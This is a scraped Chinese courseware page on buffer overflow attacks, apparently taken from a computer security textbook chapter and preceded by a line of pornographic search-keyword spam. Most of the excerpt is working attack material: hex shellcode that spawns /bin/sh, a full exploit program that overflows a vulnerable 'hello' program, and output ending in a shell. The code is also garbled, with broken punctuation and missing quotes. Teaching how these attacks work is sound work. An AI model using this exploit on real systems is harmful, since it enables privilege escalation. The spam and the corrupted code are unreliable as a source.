freepeople性欧美熟妇, 色戒完整版无删减158分钟hd, 无码精品国产vα在线观看DVD, 丰满少妇伦精品无码专区在线观看,艾栗栗与纹身男宾馆3p50分钟,国产AV片在线观看,黑人与美女高潮,18岁女RAPPERDISSSUBS,国产手机在机看影片

正文內(nèi)容

李鳳華--計(jì)算機(jī)安全與保密技術(shù)--第十章(編輯修改稿)

2025-03-19 12:32 本頁(yè)面
 

【文章內(nèi)容簡(jiǎn)介】 xc0” “\x88\x46\x07\x89\x46\x0c\xb0\x0b \x89\xf3\x8d\x4e\x08\x8d\x56\x0c” “\xcd\x80\x31\xdb\x89\xd8\x40\xcd \x80\xe8\xdc\xff\xff\xff/bin/ls。char large_string[128]。main(){ char buffer[96]。 int i。 植入代碼自測(cè)試程序 (2) long* long_ptr = (long*)large_string。 for (i = 0。 i 32。 i++) long_ptr[i] = (long)buffer。 for (i = 0。 i strlen(shell_code)。 i++) large_string[i] = shell_code[i]。 strcpy(buffer, large_string)。 printf(Is everything OK? :)\n)。} 植入代碼自測(cè)試程序 (3)$ ./test1Is everything OK? :)hello test1 完整的攻擊 hello的程序 (1)include include include unsigned char shell_code[] = \xeb\x1f\x5e\x89\x76\x08\x31\xc0” “\x88\x46\x07\x89\x46\x0c\xb0\x0b \x89\xf3\x8d\x4e\x08\x8d\x56\x0c” “\xcd\x80\x31\xdb\x89\xd8\x40\xcd \x80\xe8\xdc\xff\xff\xff/bin/sh。define DEFAULT_OFFSET 0define BUFFER_SIZE 1024 完整的攻擊 hello的程序 (2)unsigned long get_esp(){ __asm__(movl %esp, %eax)。}main(int argc, char** argv){ char* buff。 char* ptr。 unsigned long* addr_ptr。 unsigned long esp。 int i, ofs。 完整的攻擊 hello的程序 (3) if (argc == 1) ofs = DEFAULT_OFFSET。 else ofs = atoi(argv[1])。 ptr = buff = malloc(4096)。 /* Fill in with addresses */ addr_ptr = (unsigned long*)ptr。 esp = get_esp()。 printf(ESP = %08x\n, esp)。 for (i = 0。 i 100。 i++) *(addr_ptr++) = esp + ofs。 完整的攻擊 hello的程序 (4) /* Fill the start of shell buffer with NOPs */ ptr = (char*)addr_ptr。 memset(ptr,39。A39。,BUFFER_SIZEstrlen(shell_code))。 ptr += BUFFER_SIZE strlen(shell_code)。 /* And then the shell code */ memcpy(ptr, shell_code, strlen(shell_code))。 ptr += strlen(shell_code)。 *ptr = 0。 printf(Is everything OK? :)\n)。 execl(./hello, hello, buff, NULL)。} 完整的攻擊 hello的程序 (5)tly:~/tttt/tt$ ./test2ESP = bffffcd0Is everything OK? :)Hello 一堆亂碼 /bin/shbash$ _ 得出的結(jié)論p一個(gè)程序當(dāng)沒(méi)有很好地檢查邊界條件時(shí)可能會(huì)受到緩沖區(qū)溢出攻擊p有緩沖區(qū)溢出漏洞的程序當(dāng)它能以特權(quán)用戶身份運(yùn)行時(shí),可能讓普通用戶無(wú)需經(jīng)過(guò)認(rèn)證就可以獲得系統(tǒng)特權(quán) root exploitpRemote root exploit216。通過(guò)網(wǎng)絡(luò),不需認(rèn)證即可獲得 root權(quán)限pLocal root exploit216。本地普通用戶,利用系統(tǒng)程序的漏洞獲得root權(quán)限哪些程序?qū)⒁蕴貦?quán)用戶身份運(yùn)行p網(wǎng)絡(luò)服務(wù)程序216。HTTP Server、 FTP Server、 Mail Server, etcpsyslogpTrojian木馬程序psuid/sgid程序 suid/sgid程序pUnix一項(xiàng)特殊技術(shù),使普通用戶也能做只有超級(jí)用戶才能執(zhí)行的任務(wù)216。passwd、 at、 crontab、 pingp普通 rwx之上加上 s位, kernel在載入進(jìn)程映象時(shí)自動(dòng)將進(jìn)程有效用戶 /組標(biāo)識(shí)置為映象文件文件屬主 /組p例:216。ls l /usr/bin/passwd216。rsxx 1 root /usr/bin/passwd 還是攻擊 hello的例子tly:~/tttt/tt$ subash chown
點(diǎn)擊復(fù)制文檔內(nèi)容
教學(xué)課件相關(guān)推薦
文庫(kù)吧 www.dybbs8.com
備案圖片鄂ICP備17016276號(hào)-1